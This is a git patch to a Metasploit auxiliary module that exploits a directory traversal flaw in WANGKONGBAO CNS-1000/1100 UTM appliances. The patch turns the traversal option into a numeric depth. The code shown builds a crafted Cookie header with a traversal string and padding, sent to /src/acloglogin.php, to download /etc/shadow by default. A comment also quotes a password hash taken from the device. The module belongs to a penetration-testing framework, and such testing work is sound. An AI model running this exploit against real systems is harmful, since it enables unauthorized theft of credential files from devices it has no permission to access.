From 0c18662d46a9be0693fb7339d2c4c2e64ad04ea7 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Fri, 6 Jul 2012 01:10:39 -0500
Subject: [PATCH] Make msftidy happy and change the traversal option

---
 .../auxiliary/scanner/http/wangkongbao_traversal.rb    | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
index 62a20f7b48..1a74846404 100644
--- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
+++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
 					This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka
 				Network Security Platform. This directory traversal vulnerability is interesting
 				because the apache server is running as root, this means we can grab anything we
-				want! For instance, the /etc/shadow and /etc/passwd files for the special 
+				want! For instance, the /etc/shadow and /etc/passwd files for the special
 				kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user
 			},
 			'References'     =>
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				Opt::RPORT(85),
 				OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
-				OptString.new('DIRTRAVS', [true, 'Traversal depth', '../../../../../../../../../..'])
+				OptInt.new('DEPTH', [true, 'Traversal depth', 10])
 			], self.class)
 	end
 
@@ -49,6 +49,8 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end
 
+		travs = "../" * datastore['DEPTH']
+
 		# Create request
 		path = "/src/acloglogin.php"
 		res = send_request_raw({
@@ -58,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
 				{
 					'Connection' => "keep-alive",
 					'Accept-Encoding' => "zip,deflate",
-					'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + datastore['DIRTRAVS'] + datastore['FILEPATH'] + "/."*4043
+					'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + travs + datastore['FILEPATH'] + "/."*4043
 				},
 		}, 25)
 
@@ -81,4 +83,4 @@ class Metasploit3 < Msf::Auxiliary
 			print_error("Nothing was downloaded")
 		end
 	end
-end
\ No newline at end of file
+end